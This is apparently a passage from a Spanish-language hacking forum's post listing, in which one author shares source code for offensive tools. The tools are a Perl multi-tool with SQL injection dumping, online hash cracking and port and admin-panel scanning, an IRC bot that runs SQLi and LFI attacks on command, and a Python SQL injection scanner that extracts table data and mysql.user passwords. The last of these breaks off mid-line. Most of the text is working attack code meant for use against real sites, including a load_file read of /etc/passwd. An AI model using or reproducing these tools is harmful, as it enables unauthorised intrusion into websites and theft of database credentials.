$_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { } else { } } sub getip { } sub crackit { my $secret = $_[0]; print "[+] Cracking $_[0]\n\n"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> rmdir : delete a directory <dir> pwd : directory del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? ); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}} print "\n\n[+] Finish\n"; } sub scanport { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Finish\n"; } sub scanpanel { print "[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; saveyes("logs/panel-logs.txt",$_[0]."/".$path); } } print "\n\n[+] Finish\n"; } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { push(@url,$l); } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { push(@founds,$2); } } my @founds = repes(@founds); return @founds; } sub sql { my ($pass1,$pass2) = ("+","--"); my $page = shift; $code1 = toma($page."-1".$pass1."union ".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; saveyes("logs/sql-logs.txt",$page); }} sub get_links { my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); return @links; sub agarrar { my ($a,%b) = @_; push(@links,values %b); } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } sub head { cprint "\x0311"; #13 print "\n\n-- == Project STALKER == --\n\n"; cprint "\x030"; } sub copyright { cprint "\x0311"; #13 print"\n\n(C) Doddy Hackman 2011\n\n"; cprint "\x030"; } sub toma { return $nave->get($_[0])->content; } sub tomax { return $nave->get($_[0]); } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } sub conectar { my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1], Proto => "tcp",Timeout => 5); print $sockex $_[2]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r\n"; } sub enter { my ($host,$user,$pass) = @_; print "[+] Connecting to the server\n"; $info = "dbi:mysql::".$host.":3306"; if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; chomp(my $ac = <stdin>); $enter->disconnect; print "\n\n[+] Closing connection\n\n"; last; } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { print $_."\t\t"; } print "\n\n"; while (@row = $re->fetchrow_array) { for(@row) { print $_."\t\t"; } print "\n"; }}}} } else { print "\n[-] Error connecting\n"; }} sub saveyes { open (SAVE,">>".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } sub helpme { cprint "\x0310"; #13 print qq( Commands : getinfo getip <host> getlink <page> getprocess killprocess <name process> <pid process> conec <host> <port> <command> allow <host> paths <page> encodehex <text> decodehex <text> encodeascii <text> decodeascii <text> encodebase <text> decodebase <text> scanport <host> panel <page> getpass <hash> kobra <page> ftp <host> <user> <pass> mysql <host> <user> <pass> navegator scangoogle help exit ); cprint "\x030"; } # # The End ? #
|
|
|
506
|
Programación / Scripting / [Perl] Terr0r B0t By Doddy H
|
en: 7 Octubre 2011, 15:55 pm
|
Hola a todos. Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual tiene las siguientes opciones : * Codificacion y decodificacion de base64 , hex , ascii * Buscar panel de administracion de algun sitio * Scan SQLI (busca numero de columnas y da info) * Tool para explotar LFI Comandos para el bot en el canal !base64 encode/decode string !hex encode/decode string !ascii encode/decode string !panel http://127.0.0.1 !sqli http://127.0.0.1/sql.php?id= !lfi http://127.0.0.1/lfi.php?file='
Forma de uso : C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl
[+] tERR0R b0T (c) dODDy HacKMaN 2010
[+] Starting the bot [+] Online
#!usr/bin/perl #Terr0r B0t (C) Doddy Hackman 2010 #Commands to use # #!base64 encode/decode string #!hex encode/decode string #!ascii encode/decode string #!panel http://127.0.0.1 #!sqli http://127.0.0.1/sql.php?id= #!lfi http://127.0.0.1/lfi.php?file=' # # use IO::Socket; use LWP::UserAgent; use HTTP::Request::Common; @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new(); $nave->timeout(13); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n"; my $servidor = "127.0.0.1"; #Servidor IRC my $canal = "#locos"; #Canal IRC del servidor especificado my $nick = "Lepuke-Slave"; # Apodo del bot my $port = "6667"; # Puerto del servidor IRC print "[+] Starting the bot\n"; my $soquete = new IO::Socket::INET( PeerAddr =>$servidor, PeerPort => $port, Proto => 'tcp' ); if (!$soquete) { print "\n[-] No se puedo conectar en $servidor $port\n"; } print $soquete "NICK $nick\r\n"; print $soquete "USER $nick 1 1 1 1\r\n"; print $soquete "JOIN $canal\r\n"; while ( my $log = <$soquete> ) { if ($log =~ /^PING(.*)$/i){ print $soquete "PONG $1\r\n"; } if($log =~ m/:!panel (.*)$/g) { scan($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!sqli (.*)$/g) { print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n"; scan2($1); } if($log =~ m/:!fuzzdns (.*)$/g) { scan1($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!lfi (.*)$/g) { lfi($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!base64 (.*) (.*)$/g) { use MIME::Base64; my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64 ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64 ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ??\r\n"; } } if($log =~ m/:!ascii (.*) (.*)$/) { my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".ascii ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ???\r\n"; } } if($log =~ m/:!hex (.*) (.*)$/) { my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ????\r\n"; } } } sub lfi { print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n"; $code = toma($_[0]); if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n"; print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n"; for my $file(@buscar3) { $code1 = toma($_[0].$file); unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { $ok = 1; print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n"; } } unless($ok == 1) { print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n"; } } else { print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n"; } } sub scan1 { print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n"; for my $path(@dns) { $code = tomax("http://".$path.".".$_[0]); if ($code->is_success) { print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n"; } } } sub scan { print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n"; for my $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { $ct = 1; print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n"; } } if ($ct ne 1) { print $soquete "PRIVMSG $canal [-] Not found any path\r\n"; } } sub scan2 { my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($ARGV[1]); $inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2; $code = toma($inyection); if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) { $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { my $path = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..52) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; print $soquete "PRIVMSG $canal : [Page] : $page\r\n"; print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n"; print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n"; if ($test=~/RATSXPDOWN(\d+)/) { if ($path) { print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n"; } $total=~s/@number[0]/hackman /; print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n"; &details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]); last; } } } } } sub details { my $page = $_[0]; ($pass1,$pass2) = &bypass($ARGV[1]); if ($page=~/(.*)hackman(.*)/ig) { my $start = $1; my $end = $2; $test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2); $test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2); $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); if ($test2=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n"; } if ($test1=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n"; } if ($test3=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n"; } $code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n"; print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n"; print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n"; } else { print $soquete "PRIVMSG $canal : [-] Not found any data\r\n"; } print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } } } sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub ascii_de { } sub encode { my $string = $_[0]; $hex = '0x'; sub decode { $_[0] =~ s/^0x//; } sub toma { return $nave->request (GET $_[0])->content; } sub tomax { return $nave->request (GET $_[0]); } #The End
|
|
|
508
|
Programación / Scripting / Re: Como me hago un mIRC propio en python?
|
en: 7 Octubre 2011, 02:02 am
|
es complicado , tenes que saber los comandos necesarios como el tipico ping pong u otros , ademas no se me ocurre como hacer en un while una deteccion de los mensajes privados que te puedan enviar , desde mi punto de vista es complicado , pero por lo que leido es muy facil de hacerlo en delphi. Eso si si lo que queres hacer es un bot y no un cliente la cosa es diferente
|
|
|
509
|
Programación / Scripting / [Python] SQL Scanner 0.3
|
en: 7 Octubre 2011, 01:40 am
|
Bueno este es un simple scanner en python que hice para SQLI Con las sig opciones : - Verifica vulnerabilidad
- Busca columnas
- Busca el numero milagroso y saca info sobre la DB
- Saca tablas y columnas de de la DB actual o otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logs
#!usr/bin/python #SQL Scanner 0.3 (C) Doddy Hackman 2010 import os,sys,urllib2,re,binascii from urlparse import urlparse def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text+"\n") file.close() def gethost(test): return urlparse(test).netloc def header() : print "\n--== SQL Scanner ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","[DB] : "+db) savefile("logs/"+gethost(web)+".txt","[DB] : "+table) print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in 